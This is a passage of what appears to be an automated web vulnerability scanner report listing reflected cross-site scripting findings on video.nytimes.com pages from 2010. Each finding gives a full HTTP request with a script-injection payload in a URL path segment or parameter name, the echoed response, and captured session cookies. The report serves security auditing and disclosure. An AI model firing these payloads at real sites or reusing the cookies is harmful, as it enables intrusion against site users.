Host: video.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; tmq=kvq%3DD%3Bkvq%3DT; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; ups=ABD1gU1d20SA06nv;

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 03:49:21 GMT
Content-type: text/html
Content-Length: 177072

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">

<script type="
...[SNIP]...
<meta name="canonical" href="http://video.nytimes.com/video/2010/11/08/world/europe/1248069280321/troubles-on-russias-lake-baikal.html?c36d9"><script>alert(1)</script>fa5d622a454=1">
...[SNIP]...

3.366. http://video.nytimes.com/video/2010/11/09/business/1248069304600/fed-move-not-enough.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://video.nytimes.com
Path:	/video/2010/11/09/business/1248069304600/fed-move-not-enough.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b26e0"><script>alert(1)</script>529cef00bfb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /video/2010/11/09/business/1248069304600/fed-move-not-enough.html?b26e0"><script>alert(1)</script>529cef00bfb=1 HTTP/1.1
Host: video.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; tmq=kvq%3DD%3Bkvq%3DT; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; ups=ABD1gU1d20SA06nv;

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 03:45:09 GMT
Content-type: text/html
Content-Length: 229278

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">

<script type="
...[SNIP]...
<meta name="canonical" href="http://video.nytimes.com/video/2010/11/09/business/1248069304600/fed-move-not-enough.html?b26e0"><script>alert(1)</script>529cef00bfb=1">
...[SNIP]...

3.367. http://video.nytimes.com/video/2010/11/11/dining/1248069312941/tipsy-diaries-beans-with-booze.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://video.nytimes.com
Path:	/video/2010/11/11/dining/1248069312941/tipsy-diaries-beans-with-booze.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 17445"><script>alert(1)</script>7d7efaf16f5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /video/2010/11/11/dining/1248069312941/tipsy-diaries-beans-with-booze.html?17445"><script>alert(1)</script>7d7efaf16f5=1 HTTP/1.1
Host: video.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; tmq=kvq%3DD%3Bkvq%3DT; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; ups=ABD1gU1d20SA06nv;

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 03:40:53 GMT
Content-type: text/html
Content-Length: 233212

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">

<script type="
...[SNIP]...
<meta name="canonical" href="http://video.nytimes.com/video/2010/11/11/dining/1248069312941/tipsy-diaries-beans-with-booze.html?17445"><script>alert(1)</script>7d7efaf16f5=1">
...[SNIP]...

3.368. http://video.nytimes.com/video/2010/11/12/business/1248069282083/a-recovery-for-wall-street-pay.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://video.nytimes.com
Path:	/video/2010/11/12/business/1248069282083/a-recovery-for-wall-street-pay.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a3992"><script>alert(1)</script>b112273edd6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /video/2010a3992"><script>alert(1)</script>b112273edd6/11/12/business/1248069282083/a-recovery-for-wall-street-pay.html HTTP/1.1
Host: video.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; tmq=kvq%3DD%3Bkvq%3DT; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; ups=ABD1gU1d20SA06nv;

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 03:35:49 GMT
Content-type: text/html
Content-Length: 233617

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">

<script type="
...[SNIP]...
<meta name="canonical" href="http://video.nytimes.com/video/2010a3992"><script>alert(1)</script>b112273edd6/11/12/business/1248069282083/a-recovery-for-wall-street-pay.html">
...[SNIP]...

3.369. http://video.nytimes.com/video/2010/11/12/business/1248069282083/a-recovery-for-wall-street-pay.html [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://video.nytimes.com
Path:	/video/2010/11/12/business/1248069282083/a-recovery-for-wall-street-pay.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 811e2"><script>alert(1)</script>be620c72320 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /video/2010/11811e2"><script>alert(1)</script>be620c72320/12/business/1248069282083/a-recovery-for-wall-street-pay.html HTTP/1.1
Host: video.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; tmq=kvq%3DD%3Bkvq%3DT; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; ups=ABD1gU1d20SA06nv;

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 03:37:05 GMT
Content-type: text/html
Content-Length: 233617

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">

<script type="
...[SNIP]...
<meta name="canonical" href="http://video.nytimes.com/video/2010/11811e2"><script>alert(1)</script>be620c72320/12/business/1248069282083/a-recovery-for-wall-street-pay.html">
...[SNIP]...

3.370. http://video.nytimes.com/video/2010/11/12/business/1248069282083/a-recovery-for-wall-street-pay.html [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://video.nytimes.com
Path:	/video/2010/11/12/business/1248069282083/a-recovery-for-wall-street-pay.html

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 77af8"><script>alert(1)</script>c90cdf2058c was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /video/2010/11/1277af8"><script>alert(1)</script>c90cdf2058c/business/1248069282083/a-recovery-for-wall-street-pay.html HTTP/1.1
Host: video.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; tmq=kvq%3DD%3Bkvq%3DT; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; ups=ABD1gU1d20SA06nv;

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 03:38:12 GMT
Content-type: text/html
Content-Length: 233617

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">

<script type="
...[SNIP]...
<meta name="canonical" href="http://video.nytimes.com/video/2010/11/1277af8"><script>alert(1)</script>c90cdf2058c/business/1248069282083/a-recovery-for-wall-street-pay.html">
...[SNIP]...

3.371. http://video.nytimes.com/video/2010/11/12/business/1248069282083/a-recovery-for-wall-street-pay.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://video.nytimes.com
Path:	/video/2010/11/12/business/1248069282083/a-recovery-for-wall-street-pay.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bb846"><script>alert(1)</script>fa4db76b286 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /video/2010/11/12/business/1248069282083/a-recovery-for-wall-street-pay.html?bb846"><script>alert(1)</script>fa4db76b286=1 HTTP/1.1
Host: video.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; tmq=kvq%3DD%3Bkvq%3DT; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; ups=ABD1gU1d20SA06nv;

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 03:33:22 GMT
Content-type: text/html
Content-Length: 229479

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">

<script type="
...[SNIP]...
<meta name="canonical" href="http://video.nytimes.com/video/2010/11/12/business/1248069282083/a-recovery-for-wall-street-pay.html?bb846"><script>alert(1)</script>fa4db76b286=1">
...[SNIP]...

3.372. http://video.nytimes.com/video/2010/11/12/business/1248069321928/straining-to-make-mid-market-deals.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://video.nytimes.com
Path:	/video/2010/11/12/business/1248069321928/straining-to-make-mid-market-deals.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 80b2b"><script>alert(1)</script>b0d5dbb082a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /video/201080b2b"><script>alert(1)</script>b0d5dbb082a/11/12/business/1248069321928/straining-to-make-mid-market-deals.html HTTP/1.1
Host: video.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; tmq=kvq%3DD%3Bkvq%3DT; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; ups=ABD1gU1d20SA06nv;

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 03:36:41 GMT
Content-type: text/html
Content-Length: 233625

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">

<script type="
...[SNIP]...
<meta name="canonical" href="http://video.nytimes.com/video/201080b2b"><script>alert(1)</script>b0d5dbb082a/11/12/business/1248069321928/straining-to-make-mid-market-deals.html">
...[SNIP]...

3.373. http://video.nytimes.com/video/2010/11/12/business/1248069321928/straining-to-make-mid-market-deals.html [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://video.nytimes.com
Path:	/video/2010/11/12/business/1248069321928/straining-to-make-mid-market-deals.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1e762"><script>alert(1)</script>df2270cfe8 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /video/2010/111e762"><script>alert(1)</script>df2270cfe8/12/business/1248069321928/straining-to-make-mid-market-deals.html HTTP/1.1
Host: video.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; tmq=kvq%3DD%3Bkvq%3DT; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; ups=ABD1gU1d20SA06nv;

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 03:37:21 GMT
Content-type: text/html
Content-Length: 233623

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">

<script type="
...[SNIP]...
<meta name="canonical" href="http://video.nytimes.com/video/2010/111e762"><script>alert(1)</script>df2270cfe8/12/business/1248069321928/straining-to-make-mid-market-deals.html">
...[SNIP]...

3.374. http://video.nytimes.com/video/2010/11/12/business/1248069321928/straining-to-make-mid-market-deals.html [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://video.nytimes.com
Path:	/video/2010/11/12/business/1248069321928/straining-to-make-mid-market-deals.html

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e8b90"><script>alert(1)</script>e339d715d3b was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /video/2010/11/12e8b90"><script>alert(1)</script>e339d715d3b/business/1248069321928/straining-to-make-mid-market-deals.html HTTP/1.1
Host: video.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; tmq=kvq%3DD%3Bkvq%3DT; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; ups=ABD1gU1d20SA06nv;

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 03:38:15 GMT
Content-type: text/html
Content-Length: 233625

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">

<script type="
...[SNIP]...
<meta name="canonical" href="http://video.nytimes.com/video/2010/11/12e8b90"><script>alert(1)</script>e339d715d3b/business/1248069321928/straining-to-make-mid-market-deals.html">
...[SNIP]...

3.375. http://video.nytimes.com/video/2010/11/12/business/1248069321928/straining-to-make-mid-market-deals.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://video.nytimes.com
Path:	/video/2010/11/12/business/1248069321928/straining-to-make-mid-market-deals.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fed67"><script>alert(1)</script>da4ae9fb45 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /video/2010/11/12/business/1248069321928/straining-to-make-mid-market-deals.html?fed67"><script>alert(1)</script>da4ae9fb45=1 HTTP/1.1
Host: video.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; tmq=kvq%3DD%3Bkvq%3DT; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; ups=ABD1gU1d20SA06nv;

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 03:33:52 GMT
Content-type: text/html
Content-Length: 229315

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">

<script type="
...[SNIP]...
<meta name="canonical" href="http://video.nytimes.com/video/2010/11/12/business/1248069321928/straining-to-make-mid-market-deals.html?fed67"><script>alert(1)</script>da4ae9fb45=1">
...[SNIP]...

3.376. http://video.nytimes.com/video/2010/11/12/multimedia/1248069223837/bayous-quagmire-for-goldman.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://video.nytimes.com
Path:	/video/2010/11/12/multimedia/1248069223837/bayous-quagmire-for-goldman.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ec9d1"><script>alert(1)</script>b4e18d5e19f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /video/2010/11/12/multimedia/1248069223837/bayous-quagmire-for-goldman.html?ec9d1"><script>alert(1)</script>b4e18d5e19f=1 HTTP/1.1
Host: video.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; tmq=kvq%3DD%3Bkvq%3DT; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; ups=ABD1gU1d20SA06nv;

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 03:34:21 GMT
Content-type: text/html
Content-Length: 230446

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">

<script type="
...[SNIP]...
<meta name="canonical" href="http://video.nytimes.com/video/2010/11/12/multimedia/1248069223837/bayous-quagmire-for-goldman.html?ec9d1"><script>alert(1)</script>b4e18d5e19f=1">
...[SNIP]...

3.377. http://video.nytimes.com/video/2010/11/12/world/1248069321921/timescast-november-12-2010.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://video.nytimes.com
Path:	/video/2010/11/12/world/1248069321921/timescast-november-12-2010.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 77337"><script>alert(1)</script>1a269a3367e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /video/2010/11/12/world/1248069321921/timescast-november-12-2010.html?77337"><script>alert(1)</script>1a269a3367e=1 HTTP/1.1
Host: video.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
